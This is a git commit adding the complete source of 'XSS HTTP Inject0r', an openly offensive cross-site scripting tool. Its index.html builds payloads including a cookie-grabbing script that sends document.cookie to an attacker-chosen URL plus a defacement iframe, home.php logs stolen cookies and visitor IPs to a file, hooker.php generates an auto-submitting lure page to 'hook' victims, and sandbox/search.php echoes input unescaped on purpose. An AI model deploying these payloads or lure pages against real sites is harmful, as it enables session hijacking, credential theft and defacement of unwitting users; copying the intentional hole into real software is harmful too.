Browse Source

moved from https://github.com/epsylon/xss-http-injector

psy 1 year ago
parent
commit
9882220b77
9 changed files with 522 additions and 2 deletions
  1. 31 2
      README.md
  2. 13 0
      home.php
  3. 109 0
      hooker.php
  4. BIN
      images/favicon.ico
  5. BIN
      images/pwned.jpg
  6. 274 0
      index.html
  7. 36 0
      sandbox/get.html
  8. 36 0
      sandbox/post.html
  9. 23 0
      sandbox/search.php

+ 31 - 2
README.md

@@ -1,3 +1,32 @@
-# xss-http-injector
+XSS HTTP Inject0r is a proof of concept tool that shows how XSS (Cross Site Scripting) flags can be exploited easily.
 
-XSS HTTP Inject0r is a proof of concept tool that shows how XSS (Cross Site Scripting) flags can be exploited easily. It is written in HTML + Javascript + PHP and released under GPLv3. 
+It is written in HTML + Javascript + PHP and released under GPLv3.
+
+-------------------------------------
+
+To deploy it:
+
+  - run a webserver (ex: apache)
+  - place tool's folder to be accesible via web browser (ex: /var/www/)
+  - check permissions (ex: chown -R www-data:www-data /var/www/xss-http-injector/)
+  - visit it (ex: http://127.0.0.1/xss-http-injector/)
+
+-------------------------------------
+
+PoC (proof of concept):
+
+There are different 'sandboxes' ready to try your XSS injections, locally. 
+
+Enter this info to see how some flags can be exploited:
+
+-------------------------------------
+
+Hooker:
+
+This feature creates automatically a malicious code that can be sent to targets like a non-suspicious URL (ex: Index.html) to 'hook' them. 
+
+If someone click on it, will execute your exploit code. This is nice for cookie grabbing, history stealing, etc..
+
+Use sandboxes to test your hooks locally.
+
+Happy Cross Hacking!  

+ 13 - 0
home.php

@@ -0,0 +1,13 @@
+<?
+$out=fopen("cookies.txt","a");
+if($out==NULL) die("ouch!");
+foreach($_REQUEST as $k=>$v){
+	$log=date("r",time())."|";
+	$log.=$_SERVER["REMOTE_ADDR"]."|";
+	$log.="$k";
+	if(strlen($v)) $out.="|$v";
+	$log.="\n";
+	fputs($out,$log);
+}
+fclose($out);
+?>

+ 109 - 0
hooker.php

@@ -0,0 +1,109 @@
+<?php
+$target = $_REQUEST["target"];
+$vulnerability = $_REQUEST["vulnerability"];
+$injection = $_REQUEST["injection"];
+?>
+<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8">
+<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+a {
+ color:lime;
+}
+-->
+</style>
+<script type="text/javascript">
+function SetUrl(frm){
+    var ip = "<?php echo $_SERVER['SERVER_NAME']; ?>";
+    var dir = "<?php echo preg_replace("/\?.*$/","",str_replace("hooker.php", "Index.html", $_SERVER['REQUEST_URI'])); ?>";
+    alert("HOOK's URL: " +ip+dir);
+}
+</script>
+<?php
+if(isset($_REQUEST['generate']))
+{
+  generate();
+}
+?>
+</head>
+<body>
+<center>
+<br />| <a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a> |<br /><br />
+<img src="images/pwned.jpg" width="350" height="203" border="1"><br />
+'Hook' targets to execute XSS exploits on their browsers... |<a href="index.html">Back</a>|<br /><br />
+<form method="POST" name="hook_frm">
+<table border="1">
+ <tr>
+  <td>1-</td>
+  <td>
+   <table>
+    <tr>
+     <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" value='<?php echo $target;?>' size="35" readonly></td>
+    </tr>
+    <tr>
+     <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" value='<?php echo $vulnerability;?>' readonly></td>
+    </tr>
+    <tr>
+     <td><u>Injection</u> (Code to inject):</td><td><textarea name="injection" cols="40" rows="1" readonly><?php echo ($injection);?></textarea></td>
+    </tr>
+    <tr>
+     <td><u>Method</u> (GET/POST):</td><td><input type="text" name="method" value='<?php echo $_REQUEST["method"];?>' readonly></td>
+    </tr>
+   </table>
+  </td>
+ </tr>
+ <tr>
+  <td>2-</td>
+  <td>
+   <table>
+    <tr>
+     <td><u>File</u>:</td><td>Index.html</td>
+    </tr>
+   </table>
+  </td>
+ </tr>
+ <tr>
+  <td>3-</td><td><center><br /><input type="submit" value="Generate Hook!" name="generate" onclick="javascript:SetUrl();" style="padding: 10px; font-weight:bold;"><br /><br /></center></td>
+ </tr>
+</table>
+</form>
+<?php
+function generate()
+{
+$target = $_REQUEST["target"];
+$vulnerability = $_REQUEST["vulnerability"];
+$injection = utf8_decode($_REQUEST["injection"]);
+$injection = htmlentities($injection, ENT_QUOTES);
+$sHTML_Header = "<html><head><title></title><meta http-equiv='content-type' content='text/html;charset=utf-8'><script>function xss(){document.f.s.click();}</script></head>";
+$sHTML_Content = "<body onload='xss();'><form method='".$_REQUEST['method']."' name='f' action='$target'><input name='$vulnerability' value='$injection'><input type='submit' name='s'></form>";
+$sHTML_Footer =  "</body></html>";
+$filename = "Index.html"; // this is the filename of the archive ('hook') generated on your server.
+if (is_writable(getcwd())) {
+   IF (!$handle = fopen($filename, 'w')) {
+         echo "Cannot open file ($filename)";
+         exit;
+   }
+   if (fwrite($handle, $sHTML_Header) === FALSE) {
+       echo "Cannot write to file ($filename)";
+       exit;
+   }else{
+      fwrite($handle, $sHTML_Content);
+      fwrite($handle, $sHTML_Footer);
+   }
+   fclose($handle);
+}else{
+   echo "The file $filename is not writable (use: chown www-data:www-data $filename)";
+}
+}
+?>
+</center>
+</body>
+</html>

BIN
images/favicon.ico


BIN
images/pwned.jpg


+ 274 - 0
index.html

@@ -0,0 +1,274 @@
+<!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8"> 
+<link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon"> 
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+a {
+ color:lime;
+}
+-->
+</style>
+<script type="text/javascript">
+var alertbox = "<BODY ONLOAD=alert('1')>";
+var marquee = "<marquee>0wned!</marquee>";
+var cookie = "<ScRIPt>alert(document.cookie);<\/ScRiPt>";
+var iframe = "<iFrAmE src='../images/pwned.jpg' scrolling=no frameborder=0 width='812' height='576'><\/iFrAmE>";
+window.onload = function() {
+    document.getElementById('use_custom').style.display = 'none';
+    document.getElementById('cookie_grab_script_div').style.display = 'none';
+    document.getElementById('get_poc').style.display = 'block';
+    document.getElementById('post_poc').style.display = 'none';
+}
+function SetMethod(frm){
+ if (document.getElementById('get').checked){
+         document.getElementById('post_poc').style.display = 'none';
+         document.getElementById('get_poc').style.display = 'block';
+         document.poc.method="GET";
+     }
+     else{
+         document.getElementById('post_poc').style.display = 'block';
+         document.getElementById('get_poc').style.display = 'none';
+         document.poc.method="POST";
+     }
+}
+function SetScenario(frm){
+prefix = frm.prefix.value;
+custom_value = frm.custom_injection.value;
+cookie_grab_script=frm.cookie_grab_script.value;
+  if (frm.target.value == ""){
+     alert("Hey! Where is your target?")
+     return false;
+     }
+  else if (frm.vulnerability.value == ""){ 
+     alert("You should enter a vulnerable parameter")
+     return false;
+     }
+     document.poc.action=frm.target.value;
+     document.getElementById('lulz').name=frm.vulnerability.value;
+     if(document.getElementById('alertbox').checked) {
+     document.getElementById('lulz').value=prefix+alertbox;
+     }
+     if(document.getElementById('marquee').checked) {
+     document.getElementById('lulz').value=prefix+marquee;
+     }
+     if(document.getElementById('cookie').checked) {
+     document.getElementById('lulz').value=prefix+cookie;
+     }
+     if(document.getElementById('iframe').checked) {
+     document.getElementById('lulz').value=prefix+iframe;
+     }
+     if(document.getElementById('custom').checked) {
+     document.getElementById('lulz').value=prefix+custom_value;
+     }
+     if(document.getElementById('cookie_grab').checked){ 
+     document.getElementById('lulz').value=prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+cookie_grab_script+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3c%2FScRiPt%3E");
+
+     }
+     document.poc.submit();
+}
+function SetHook(frm){
+target = frm.target.value;
+vulnerability = frm.vulnerability.value;
+prefix = frm.prefix.value;
+custom_value = frm.custom_injection.value;
+custom_cookie_url = frm.cookie_grab_script.value;
+  if (target == ""){
+     alert("Hey! Where is your target?")
+     return false;
+     }
+  else if (vulnerability == ""){
+     alert("You should enter a vulnerable parameter")
+     return false;
+     }
+     if(document.getElementById('alertbox').checked) {
+     injection = prefix+alertbox;
+     }
+     if(document.getElementById('marquee').checked) {
+     injection = prefix+marquee;
+     }
+     if(document.getElementById('cookie').checked) {
+     injection = prefix+cookie;
+     }
+     if(document.getElementById('cookie_grab').checked) {
+     injection = prefix+unescape("%3CScRiPt%3Edocument.write%28%22%3Cimg%20src=%27")+custom_cookie_url+unescape("?%22%2bescape%28document.cookie%29%2b%22%27%3E%22%29")+";document.location='http://google.com';"+unescape("%3C%2FScRiPt%3E");
+     }
+     if(document.getElementById('iframe').checked) {
+     injection = prefix+iframe;
+     }
+     if(document.getElementById('custom').checked) {
+     injection = prefix+custom_value;
+     }
+     document.getElementById('injection').value=injection;
+     document.poc.action="hooker.php";
+     document.poc.submit();
+}
+function SetScript(frm) {
+	document.getElementById('use_custom').style.display = 'none';
+	document.getElementById('cookie_grab_script_div').style.display = 'none';
+        document.getElementById('line1').style.display = 'none';
+    if (document.getElementById('custom').checked) {
+        document.getElementById('use_custom').style.display = 'block';
+        document.getElementById('line1').style.display = 'block';
+    }else if (document.getElementById('cookie_grab').checked) {
+        document.getElementById('cookie_grab_script_div').style.display = 'block';
+        document.getElementById('line1').style.display = 'block';
+    }
+}
+function LoadPoc(m,target,vuln,prefix,cook_grab_scr){
+	if(m=="GET"){
+		document.getElementById("get").checked=true;
+	}else{
+		document.getElementById("post").checked=true;
+	}
+	document.getElementById("target").value=target;
+	document.getElementById("vulnerability").value=vuln;
+	document.getElementById("prefix").value=unescape(prefix);
+	document.getElementById("cookie_grab_script").value=cook_grab_scr;
+}
+var cans=Array();
+var frame=0;
+var vStickLength=0.6*(-5+18*Math.random());
+var vStickWidth=0.5+5*Math.random();
+var vIncX=Math.random()*80+20;
+var blocks=Array();
+function Egg(){
+        window.scrollBy(0,100);
+	var canvas = document.createElement('canvas');
+	canvas.id = "CursorLayer";
+	canvas.width  = 250;
+	canvas.height = 46;
+	canvas.style.zIndex = -2;
+	canvas.style.position = "relative";
+	canvas.style.padding = 5;
+	canvas.style.top = 0; 
+	canvas.style.border = "1px solid";
+	var context = canvas.getContext('2d');
+	if(frame<55){
+	canvas.style.background = 'rgba('+parseInt(Math.random()*8+30)+','+parseInt(Math.random()*8+30)+','+parseInt(100+Math.random()*155)+',1)';
+	context.font = 'italic 20pt Calibri';
+	context.fillStyle='rgba('+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+','+parseInt(Math.random()*25)+',1)';
+	context.fillText('BigBrother!!!', 20, 30);
+	}else{
+	canvas.style.background = 'lime';
+        context.font = 'italic 20pt Courier';
+        context.fillStyle='black';
+	luck=Array("Remember","Use", "Squat", "Think", "Mayh3m!", "Hell!", "Destroy", "Fight", "Big Brother!", "Shit", "The", "Crypto", "Anarchy", "Truth", "Out", "Ilegal", "Hack", "CCTV", "XSS", "Satellite", "SlaveMaster", "Money", "Bitcoin", "Will be")
+        context.fillText(luck[parseInt(luck.length*Math.random())], 20, 30);
+	}
+	if(frame<60) {
+		b=document.body.appendChild(canvas);
+		if(frame<60) blocks.push(b);
+	}else{
+		if(typeof blocks[frame-60]!="undefined") blocks[frame-60].style.display="none";
+	}
+	var canvas = document.createElement('canvas');
+	canvas.style.zIndex   = -666;
+	canvas.width = 360;
+	canvas.height = 598;
+	canvas.style.position = "fixed";
+        canvas.style.left=((frame*vIncX)%1024)+"px";
+	canvas.style.top="10px";
+	cans[frame]=canvas;
+	document.body.appendChild(canvas);
+	var ctx = canvas.getContext('2d');
+	ctx.moveTo(-15+Math.random(50),20);
+	for(i=0;i<5;i++){
+	ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
+	ctx.lineWidth=3;
+	ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.4)';
+        ctx.beginPath();
+	cx=60+100*Math.random();
+	cy=50+400*Math.random();
+      	ctx.arc(cx,cy, i*8.5, 0, 2 * Math.PI, false);
+	ctx.fill();
+	ctx.strokeStyle='rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
+	ctx.fillStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',0.1)';
+	ctx.arc(cx*vStickWidth,cy*vStickLength, i*2.5, 0, 2 * Math.PI, false);
+        ctx.fill();
+        ctx.lineWidth = i/6;
+        ctx.strokeStyle = '#aa3300';
+	if(!(frame%5)){
+		for(j=0;j<=cans.length;j++){
+			if(typeof cans[j] === 'undefined') continue;
+			ctx=cans[j].getContext("2d");
+			ctx.strokeStyle = 'rgba('+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+','+parseInt(Math.random()*255)+',1)';
+		}
+	}
+}
+setTimeout('Egg()', 200);
+frame++;
+}
+</script>
+</head><body>
+<center>
+ <table>
+   <tr valign="middle">
+     <td align="center">
+<br /><h2><a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a></h2> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a><br /><font size=-1><a style="text-decoration:none;" href=# onClick=javascript:Egg()>"little rabbit"</a> version</font>
+      </td>
+     <td>
+<img hspace="10" src="images/pwned.jpg" width="350" height="203" border="1"><br />
+     </td>
+    </tr>
+ </table>
+<hr>
+<form name="poc">
+<table>
+ <tr>
+  <td><u>Method</u> (HTTP method):</td><td><table><tr><td><input type="radio" name="method" id="get" onclick="javascript:SetMethod();" checked value="GET">GET</td><td><input type="radio" name="method" id="post" onclick="javascript:SetMethod(this.form);" value="POST">POST</td></tr></table></td>
+ </tr>
+ <tr>
+ <td colspan=2>
+<hr><script>var l=""+document.location;l=l.replace(/(.*)\/.*/,"$1/home.php")</script>
+<label id="get_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/get.html" target="_blank">SandBoX (HTTP-GET)</a> | <a onClick="javascript:LoadPoc('GET','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
+<label id="post_poc"><b>PoC</b> -> Target: <i>sandbox/search.php</i> -> Vuln.: <i>search_text</i> -> Vector: <i>"></i> | <a href="sandbox/post.html" target="_blank">SandBoX (HTTP-POST)</a> | <a onClick="javascript:LoadPoc('POST','sandbox/search.php','search_text','%22>',l)" href=#>Load PoC</a></label>
+<hr>
+</td>
+ </tr>
+ <tr>
+ <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" size="35" id="target"> (<i>ex: http://vulnsite.com/contact.php</i>)</td>
+ </tr>
+ <tr>
+  <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" id="vulnerability"> (<i>ex: contact_email</i>)</td>
+ </tr>
+ <tr>
+  <td><u>Vector</u> (Code prefix to inject):</td><td><input type="text" name="prefix" size="35" id="prefix"> (<i>ex: "></i>)</td>
+ </tr>
+</table>
+<hr>
+<table border="1" cellpadding="6" cellspacing="6">
+ <tr>
+  <td>JS Alert</td><td> <input type="radio" name="exploit" id="alertbox" onclick="javascript:SetScript();" checked></td>
+  <td>Cookie Popup</td><td> <input type="radio" name="exploit" id="cookie" onclick="javascript:SetScript();" /></td>
+  <td>HTML Marquee</td><td> <input type="radio" name="exploit" id="marquee" onclick="javascript:SetScript();" /></td>
+  <td>Cookie Grabbing</td><td> <input type="radio" name="exploit" id="cookie_grab" onclick="javascript:SetScript();" /></td>
+  <td>Defacement</td><td> <input type="radio" name="exploit" id="iframe" onclick="javascript:SetScript();" /></td>
+  <td>Custom Script</td><td> <input type="radio" name="exploit" id="custom" onclick="javascript:SetScript();" /></td>
+ </tr>
+</table>
+<hr id="line1" style="display:none">
+<div id="use_custom" style="display:none">
+ Custom injection: <input type="text" name="custom_injection" size="92">
+</div>
+<div id="cookie_grab_script_div" style="display:none">
+ Grabbing URL: <input type="text" id="cookie_grab_script" name="cookie_grab_script" size="92">
+</div>
+<hr>
+  <input type="hidden" id="lulz"></input>
+  <input type="hidden" name="injection" id="injection"></input>
+<table cellpadding="6" cellspacing="6" border="0">
+ <tr>
+  <td><input type="submit" value="Inject!" onClick="return SetScenario(this.form)" style="padding: 10px; font-weight:bold;"></td>
+  <td><input type="submit" value="Hooker" onClick="return SetHook(this.form)" style="padding: 10px; font-weight:bold;"></td>
+ </tr>
+</table>
+</form>
+</body>
+</html>

+ 36 - 0
sandbox/get.html

@@ -0,0 +1,36 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html>
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8">
+<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon">
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+-->
+</style><title>Simple XSS HTTP GET vulnerability</title>
+<body>
+<form action="search.php" method="get">
+<p align="center"><strong>Simple HTTP GET XSS vulnerability</strong></p>
+<div align="center">
+  <table width="270" border="0">
+    <tr>
+      <td width="106"><strong>Search:</strong></td>
+        <td width="154"><input name="search_text" type="text" id="search_text" /></td>
+      </tr>
+  </table>
+  <table width="268" border="0">
+    <tr>
+      <td width="262"><div align="center">
+        <input name="submit" type="submit" value="Search it!" />
+      </div></td>
+      </tr>
+  </table>
+  </div>
+</form>
+</body>
+</html>

+ 36 - 0
sandbox/post.html

@@ -0,0 +1,36 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html>
+<head><title>XSS HTTP Inject0r!</title>
+<meta http-equiv="content-type" content="text/html;charset=utf-8">
+<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon">
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+-->
+</style><title>Simple XSS HTTP POST vulnerability</title>
+<body>
+<form action="search.php" method="post">
+<p align="center"><strong>Simple HTTP POST XSS vulnerability</strong></p>
+<div align="center">
+  <table width="270" border="0">
+    <tr>
+      <td width="106"><strong>Search:</strong></td>
+        <td width="154"><input name="search_text" type="text" id="search_text" /></td>
+      </tr>
+  </table>
+  <table width="268" border="0">
+    <tr>
+      <td width="262"><div align="center">
+        <input name="submit" type="submit" value="Search it!" />
+      </div></td>
+      </tr>
+  </table>
+  </div>
+</form>
+</body>
+</html>

+ 23 - 0
sandbox/search.php

@@ -0,0 +1,23 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<?php
+setcookie("SessionID", time()+3600*24);
+?>
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
+<link rel="shortcut icon" href="../images/favicon.ico" type="image/x-icon">
+<title>Search result:</title>
+<style type="text/css">
+<!--
+body,td,th {
+color: #FFFFFF;
+}
+body {
+background-color: #000000;
+}
+-->
+</style></head>
+<body>
+<span>Search result  :</span>&nbsp;<strong><?php echo $_REQUEST['search_text']; ?></strong>&nbsp;
+</body>
+</html>